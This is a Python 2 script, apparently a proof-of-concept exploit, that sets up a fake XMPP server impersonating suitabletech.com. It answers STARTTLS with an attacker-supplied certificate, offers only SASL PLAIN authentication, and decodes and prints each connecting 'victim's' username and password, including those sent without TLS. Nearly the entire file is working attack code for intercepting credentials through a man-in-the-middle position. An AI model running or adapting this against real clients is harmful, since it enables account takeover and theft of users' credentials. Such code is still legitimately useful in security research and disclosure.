#!/usr/bin/env python | |
import base64
import os
import re
import socket
import ssl
import sys
import thread
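# Listen on every interface. How the victim is steered to this host (DNS or
# ARP spoofing, a hostile access point, ...) is outside this script.
HOST = '0.0.0.0'
# Standard XMPP client-to-server port (RFC 6120).
PORT = 5222
# Bytes requested per recv() call.
BUFFER = 2048

# Domain the fake server claims to be. It has to match the domain the victim's
# client connects to, and the certificate given on the command line must be one
# that client is willing to accept for this name.
DOMAIN = 'suitabletech.com'

# Server stream header, sent before and again after STARTTLS. The stream id is
# an arbitrary fixed token; nothing here depends on its value.
message1 = (
    "<?xml version='1.0'?>"
    "<stream:stream xmlns:stream='http://etherx.jabber.org/streams' "
    "xmlns='jabber:client' from='%s' version='1.0' "
    "id='yzd6vaewp51cr4pppt8ub8rvuew5x2ev1r1x1gtr'>" % DOMAIN
)

# Post-TLS feature list: the only SASL mechanism offered is PLAIN (plus the
# legacy iq-auth feature), so the client hands over the password in a form we
# can decode directly. A client that refuses PLAIN never sends it.
message2 = (
    "<stream:features xmlns:stream='http://etherx.jabber.org/streams'>"
    "<mechanisms xmlns='urn:ietf:params:xml:ns:xmpp-sasl'><mechanism>PLAIN</mechanism></mechanisms>"
    "<auth xmlns='http://jabber.org/features/iq-auth'/>"
    "</stream:features>"
)

# Pre-TLS feature list: same as above plus the STARTTLS offer. Because PLAIN is
# advertised here too, a client that skips TLS may send credentials in the
# clear right away.
message2tls = (
    "<stream:features xmlns:stream='http://etherx.jabber.org/streams'>"
    "<starttls xmlns='urn:ietf:params:xml:ns:xmpp-tls'/>"
    "<mechanisms xmlns='urn:ietf:params:xml:ns:xmpp-sasl'><mechanism>PLAIN</mechanism></mechanisms>"
    "<auth xmlns='http://jabber.org/features/iq-auth'/>"
    "</stream:features>"
)

# Answer to the client's <starttls/>. Only the <proceed/> element belongs here:
# the client starts the TLS handshake immediately after it, so the stray tail
# of message2tls that used to follow it was malformed XML at best and garbage
# fed to the client's TLS layer at worst.
message3 = "<proceed xmlns='urn:ietf:params:xml:ns:xmpp-tls'/>"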
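def _recv_until(sock, markers, limit=BUFFER * 8):
    """Read from ``sock`` until one of ``markers`` has been seen.

    Stops early when the peer closes or ``limit`` bytes are buffered, so a
    chatty or hostile client cannot make us buffer without bound. Returns all
    bytes read (empty if the peer closed right away).
    """
    data = b''
    while len(data) < limit and not any(m in data for m in markers):
        chunk = sock.recv(BUFFER)
        if not chunk:
            break
        data += chunk
    return data


def _parse_plain_credentials(authblock):
    """Return (username, password) from a SASL PLAIN ``<auth>`` element, or None.

    The element body is base64 of ``[authzid] NUL authcid NUL password``
    (RFC 4616), so field 1 is the username and field 2 the password whether or
    not an authorization identity was supplied. Malformed input (no ``<auth>``
    element, bad base64, too few fields) yields None rather than an exception
    so the caller can report it.
    """
    match = re.search(br'<auth[^>]*>([^<]+)</auth>', authblock)
    if match is None:
        return None
    try:
        fields = base64.b64decode(match.group(1)).split(b'\x00')
    except (TypeError, ValueError):  # Python 2 raises TypeError, Python 3 binascii.Error
        return None
    if len(fields) < 3:
        return None
    return fields[1], fields[2]


def mitm_thread(victim, certificate, private_key):
    """Serve one victim as a fake XMPP server and harvest its SASL PLAIN login.

    Steps, one victim per thread:
      1. read the client's stream header; answer with ours and a feature list
         advertising STARTTLS;
      2. read the client's <starttls/>; answer <proceed/> and wrap the socket
         server-side with ``certificate``/``private_key`` (PEM paths);
      3. read the client's post-TLS stream header; answer with our header and
         a feature list offering only SASL PLAIN;
      4. read the <auth> element and print the decoded username and password.

    The attack only succeeds if the client accepts the certificate we present
    (a client that validates or pins the server certificate fails step 2) and
    is willing to use PLAIN (one that insists on a stronger mechanism stops at
    step 4). Since message2tls also advertises PLAIN, a client that never asks
    for STARTTLS may send its credentials in the clear at step 2; that case is
    handled too. Errors are printed, never raised, because this runs in a
    detached thread; the victim socket is always closed. Written for Python 2
    (``thread`` module, str sockets).
    """
    ssl_socket = None
    try:
        # A silent client must not pin this thread forever.
        victim.settimeout(30.0)

        pkt = victim.recv(BUFFER)
        print("# Received from victim: %s" % pkt.rstrip())
        victim.send(message1)
        victim.send(message2tls)

        pkt = victim.recv(BUFFER)
        print("# Received from victim: %s" % pkt.rstrip())
        if b'<starttls' not in pkt:
            # No TLS requested: either the client skipped straight to PLAIN
            # (credentials arrive in the clear) or it gave up.
            if b'</auth>' not in pkt:
                pkt += _recv_until(victim, (b'</auth>', b'</stream:stream>'))
            creds = _parse_plain_credentials(pkt)
            if creds is None:
                print("# Victim did not request STARTTLS and sent no PLAIN auth, giving up")
            else:
                print("# Found credentials (sent without TLS).\n Username: %s\n Password: %s" % creds)
            return

        victim.send(message3)
        print("# Victim connection switched to TLS")
        # NOTE: ssl.wrap_socket was removed in Python 3.12; kept because this
        # script is Python 2. The handshake happens here, so a client that
        # rejects our certificate surfaces as an exception below.
        ssl_socket = ssl.wrap_socket(victim, server_side=True, suppress_ragged_eofs=False, certfile=certificate, keyfile=private_key)

        pkt = ssl_socket.recv(BUFFER)
        print("# Received from victim: %s" % pkt.rstrip())
        ssl_socket.send(message1)
        ssl_socket.send(message2)

        # The <auth> element may not arrive in a single segment; read until it
        # is complete, or the client closes its stream instead.
        authblock = _recv_until(ssl_socket, (b'</auth>', b'</stream:stream>'))
        print("# Received from victim: %s" % authblock.rstrip())
        if not authblock:
            # Client closed the TLS stream without authenticating; most likely
            # it did not trust our certificate after all.
            print("Something went wrong with our TLS certificate")
            return
        creds = _parse_plain_credentials(authblock)
        if creds is None:
            print("# No SASL PLAIN credentials in the auth block (client may have refused PLAIN)")
            return
        print("# Found credentials.\n Username: %s\n Password: %s" % creds)
    except Exception as e:
        print("Error: %s" % e)
    finally:
        # Closing the SSL wrapper also closes the underlying connection; fall
        # back to the raw socket when the wrap never happened.
        if ssl_socket is not None:
            ssl_socket.close()
        else:
            victim.close()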
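if __name__ == '__main__':
    # Usage: <certificate> <private_key> — PEM files for the domain we impersonate.
    if len(sys.argv) != 3:
        sys.exit('Usage: %s <certificate> <private_key>\nExample: %s suitabletech.com.pem suitabletech.com.key' % (sys.argv[0], sys.argv[0]))
    certificate = sys.argv[1]
    private_key = sys.argv[2]
    # Fail fast on a missing file; otherwise every victim thread would die
    # inside ssl.wrap_socket with a far less obvious error.
    for path in (certificate, private_key):
        if not os.path.isfile(path):
            sys.exit('Cannot read %s' % path)

    server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    # Allow an immediate restart while old victim connections sit in TIME_WAIT.
    server.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    server.bind((HOST, PORT))
    server.listen(2)
    print("Started fake XMPP Server on port %s" % PORT)
    try:
        while True:
            victim, address = server.accept()
            print("New Victim connected: %s" % address[0])
            # One detached thread per victim; mitm_thread closes the socket itself.
            thread.start_new_thread(mitm_thread, (victim, certificate, private_key))
    except KeyboardInterrupt:
        pass
    finally:
        server.close()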